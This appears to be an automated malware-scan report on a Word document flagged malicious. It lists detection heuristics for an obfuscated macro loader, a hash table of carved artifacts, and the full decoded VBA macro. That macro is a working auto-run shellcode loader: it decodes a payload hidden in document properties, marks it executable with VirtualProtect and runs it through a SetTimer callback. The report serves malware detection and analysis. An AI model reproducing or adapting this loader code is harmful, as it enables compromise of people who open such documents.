MALICIOUS
Risk Score: 310
Heuristics: 9

- VBA project inside OOXML (severity: medium; rule: OOXML_VBA; 6 related findings). Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: word/MCKwOqqCvm.bin).
- VBA property-stored shellcode loader (severity: critical; rule: OLE_VBA_PROPERTY_SHELLCODE_LOADER). VBA auto-exec macro takes the address (VarPtr) of a byte buffer decoded from a document property, marks memory executable (VirtualProtect/VirtualAlloc), and transfers control through a callback API (e.g. SetTimer/EnumWindows). The payload is hidden in the document properties rather than the macro source — the SVCReady loader pattern, a native shellcode runner rather than a parser CVE.
  - Matched line in script: `Private Declare PtrSafe Function ScribbetSonnets Lib "user32" Alias "SetTimer" (ByVal RecombedGainsayingChumpishness As LongPtr, ByVal RegellingRecommittalBrummy As LongPtr, ByVal SpuriesNerols As LongPtr, ByVal CluppeCancerphobiaUnbanded As LongPtr) As LongPtr`
- Obfuscated auto-exec VBA loader (severity: critical; rule: OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER). Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  - Matched line in script: `GetObject(uwlH4o6YYz("fh3AAa")).Environment(uwlH4o6YYz("DyfplMjlWo"))(uwlH4o6YYz("ea4IRKRw5s")) = ActiveDocument.FullName`
- VBA project part renamed to evade filename detection (severity: high; rule: OOXML_VBA_PROJECT_RENAMED). The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
- GetObject call (severity: high; rule: OLE_VBA_GETOBJ). GetObject call.
  - Matched line in script: `GetObject(uwlH4o6YYz("fh3AAa")).Environment(uwlH4o6YYz("DyfplMjlWo"))(uwlH4o6YYz("ea4IRKRw5s")) = ActiveDocument.FullName`
- VBA reads reversed config from document properties (severity: high; rule: OLE_VBA_REVERSED_DOCPROP_CONFIG). VBA applies StrReverse to values read from the document's custom/built-in properties. Storing reversed configuration (URLs, CLSIDs, env-var names, payload names) in document properties keeps indicators out of the macro source — an obfuscation technique used by the SVCReady loader.
  - Matched line in script: `uwlH4o6YYz = StrReverse(ActiveDocument.CustomDocumentProperties(strInput))`
- Document_Open macro (severity: low; rule: OLE_VBA_DOCOPEN). Document_Open macro.
  - Matched line in script: `Private Sub Document_Open()`
- OOXML part with non-standard content type and high-entropy data (severity: high; rule: OOXML_BOGUS_CUSTOM_PART). The package declares a part with an invented content type (not an OpenXML/Office/standard media type) holding large, high-entropy (likely encrypted/packed) data. Legitimate OOXML files do not carry opaque binary blobs under custom content types; this is the embedded next-stage payload pattern used by loaders such as SVCReady.
- Embedded URL (severity: info; rule: EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the following were found in document text (OOXML body / shared strings):
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 5100 bytes | 5cfd189a4c59a03e49ae68f4313a260f47c6e425717cedfea3ac1aa206de182c |
| vbaProject_00.bin | vba-project | OOXML VBA project: word/MCKwOqqCvm.bin | 8704 bytes | a46953e9c7cd0f755c0e7b6e3d465340450aac3e1cb1ce2ee0c0c0dfda216026 |

Preview script (macros.bas): first 1,000 lines of the extracted script.

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function ScribbetSonnets Lib "user32" Alias "SetTimer" (ByVal RecombedGainsayingChumpishness As LongPtr, ByVal RegellingRecommittalBrummy As LongPtr, ByVal SpuriesNerols As LongPtr, ByVal CluppeCancerphobiaUnbanded As LongPtr) As LongPtr
Private Declare PtrSafe Function DawkinWoons Lib "kernel32" Alias "VirtualProtect" (ByVal ShivsTentigo As LongPtr, ByVal HaemostasisDeadlinessSchedulers As LongPtr, ByVal AcylaminoMisstatedTopsail As LongPtr, AnabasineAtracheate As LongPtr) As LongPtr
Private Declare PtrSafe Function ExhumationsDisencharm Lib "user32" Alias "KillTimer" (ByVal PreillustrateSusceptiblyVegetive As LongPtr, ByVal DesalinizingFungosity As LongPtr) As LongPtr
#Else
Private Declare Function ScribbetSonnets Lib "user32" Alias "SetTimer" ( ByVal ElectrolyzableAluminite As Long, ByVal HyphenizeNontreasonablyNoncadenced As Long, ByVal NoninfectingHagrideFrigidaria As Long, ByVal BrachycephalizationSplitters As Any) As Long
Private Declare Function DawkinWoons Lib "kernel32" Alias "VirtualProtect" (ByVal UntraitorousHollantideSolfeges As Long, ByVal FeminizePeregrinusCultigen As Long, ByVal UnrelentableUndiscouraginglyLovelier As Long, CrowsteppedLophiomyinaeHugest As Long) As Long
Private Declare Function ExhumationsDisencharm Lib "user32" Alias "KillTimer" ( ByVal EpicycleEducatedlyLugubriosity As Long, ByVal CephalometerAttagal As Long) As Long
#End If
Private Sub Document_Open()
Dim SupernegligentlyLexicographers() As Byte
#If Win64 Then
SupernegligentlyLexicographers = PupilloscopyRadicallyLenad(ActiveDocument.BuiltInDocumentProperties(uwlH4o6YYz("EGHbu9IrT")).Value)
#Else
SupernegligentlyLexicographers = PupilloscopyRadicallyLenad(ActiveDocument.BuiltInDocumentProperties(uwlH4o6YYz("vyTyCvUsj")).Value)
#End If
#If VBA7 Then
Dim OutfablesMicrospheruliticReckons As LongPtr
Dim WhitrackDatelinesOozoa As LongPtr
Dim NonexigentlyIntestinesOstearthritis As LongPtr
Dim FaipuleMelicerous As LongPtr
#Else
Dim OutfablesMicrospheruliticReckons As Long
Dim WhitrackDatelinesOozoa As Long
Dim NonexigentlyIntestinesOstearthritis As Long
Dim FaipuleMelicerous As Long
#End If
WhitrackDatelinesOozoa = UBound(SupernegligentlyLexicographers) + 1
NonexigentlyIntestinesOstearthritis = VarPtr(SupernegligentlyLexicographers(0))
DawkinWoons NonexigentlyIntestinesOstearthritis, WhitrackDatelinesOozoa, 64, VarPtr(OutfablesMicrospheruliticReckons)
GetObject(uwlH4o6YYz("fh3AAa")).Environment(uwlH4o6YYz("DyfplMjlWo"))(uwlH4o6YYz("ea4IRKRw5s")) = ActiveDocument.FullName
GetObject(uwlH4o6YYz("Sod0ECDat")).Environment(uwlH4o6YYz("HLyi8m6RDv57"))(uwlH4o6YYz("Pc1C6dscU")) = uwlH4o6YYz("qMBmari")
FaipuleMelicerous = ScribbetSonnets(0, NonexigentlyIntestinesOstearthritis, 1, NonexigentlyIntestinesOstearthritis)
NostrilsomeUnpracticed 1
ExhumationsDisencharm 0, FaipuleMelicerous
GetObject(uwlH4o6YYz("dbGi4qyqFq")).Environment(uwlH4o6YYz("ARCuddBQd")).Remove (uwlH4o6YYz("bytJaS5YG"))
GetObject(uwlH4o6YYz("WiYZGCHGG")).Environment(uwlH4o6YYz("syonZUoFo")).Remove (uwlH4o6YYz("GgXZ5rIN"))
ReDim SupernegligentlyLexicographers(1)
End Sub
Sub NostrilsomeUnpracticed(Finish)
Dim SilhouettingAdactylia As Long
Dim SasanquaGatheredIsomaltose As Long
SasanquaGatheredIsomaltose = Timer() + (Finish)
Do
SilhouettingAdactylia = Timer()
DoEvents
Loop Until SilhouettingAdactylia > SasanquaGatheredIsomaltose
End Sub
Function FibrochondromaChristhoodPrecancerous(KeratocricoidBeltmakingDonatio, DioctophymeAntinepoticApiology)
FibrochondromaChristhoodPrecancerous = Mid(KeratocricoidBeltmakingDonatio, DioctophymeAntinepoticApiology + 1, 1)
End Function
Function AnticynicallyGrozer(MoneyPhysicists) As Long
If Int(Rnd(23)) > 2 Then
AnticynicallyGrozer = 9000
Else
AnticynicallyGrozer = Len(MoneyPhysicists)
End If
End Function
Function PupilloscopyRadicallyLenad(SubstoreroomAuxinicThysanurian)
ReDim ConcursAssemblingHypercyanotic(AnticynicallyGrozer(SubstoreroomAuxinicThysanurian) - 1) As Byte
Dim NonaffiliatingSinters As Long, DoweledTchastPleuronect As Long
Dim ChestilyBechatter: ChestilyBechatter = uwlH4o6YYz("inLFScG1x2Yyu") & uwlH4o6YYz("vqMxZXnjdcUW")
For NonaffiliatingSinters = 0 To AnticynicallyGrozer(SubstoreroomAuxinicThysanurian) - 1 Step 2
DoweledTchastPleuronect = NonaffiliatingSinters / 2
ConcursAssemblingHypercyanotic(DoweledTchastPleuronect) = CDec(ChestilyBechatter & FibrochondromaChristhoodPrecancerous(SubstoreroomAuxinicThysanurian, NonaffiliatingSinters) & FibrochondromaChristhoodPrecancerous(SubstoreroomAuxinicThysanurian, NonaffiliatingSinters + 1))
Next
PupilloscopyRadicallyLenad = ConcursAssemblingHypercyanotic
End Function
Public Function uwlH4o6YYz(strInput)
uwlH4o6YYz = StrReverse(ActiveDocument.CustomDocumentProperties(strInput))
End Function
```